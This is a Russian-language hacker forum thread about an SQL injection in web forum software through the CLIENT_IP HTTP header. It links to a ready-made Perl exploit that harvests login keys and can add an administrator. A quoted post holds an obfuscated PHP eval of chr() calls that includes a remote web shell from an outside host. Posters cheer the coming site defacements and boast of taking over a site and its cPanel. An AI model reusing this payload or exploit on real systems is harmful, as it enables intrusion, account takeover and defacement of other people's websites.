eval

Есть еще метод но работает если отключена авторизация пользователей по е-маил.
Уязвимость относится к классу SQL-инъекций. Смысл состоит в том, что недостаточная проверка данных, передаваемых в HTTP-заголовке CLIENT_IP приводит к уязвимости типа SQL injection.
Эксплойт, написанный RST очень интересный по сути, его есть возможность запустить локально. Кроме этого, он имеет простое графическое окошко, куда вписываются данные и элементарно получаются данные для входа на форуме (а именно member_login_key). Кроме этого, при наличии session_id и session_ip_adres есть возможность просто регнуть нового администратора. При таком эксплойте пойдет страшная волна дефейсов по всей сети, ведь для такого эксплойта ничего, кроме скачанного Перла знать не нужно, достаточно запусттиь эксплойт из консоли и все.

<a href="http://rst.void.ru/download/r57ipb216gui.txt" target="_blank">http://rst.void.ru/download/r57ipb216gui.txt</a> - код эксплоита
 
<!--quoteo--><div class='quotetop'>Цитата</div><div class='quotemain'><!--quotec-->eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //<!--QuoteEnd--></div><!--QuoteEEnd-->
и че этот код делат то?
 
<!--QuoteBegin-ghz+3.09.2006, 07:24--><div class='quotetop'>Цитата(ghz @ 3.09.2006, 07:24)</div><div class='quotemain'><!--QuoteEBegin-->и че этот код делат то?
<div align="right">[snapback]32230[/snapback]</div><!--QuoteEnd--></div><!--QuoteEEnd-->
Шелл. А далее чего хочешь. Я знаю кто через это навернул весь сайт..и цпанель. ЫыЫЫ
 
ипать каким образом он шелл то делает?
заливает?
откуда
ипать обсните -_-
 
Сверху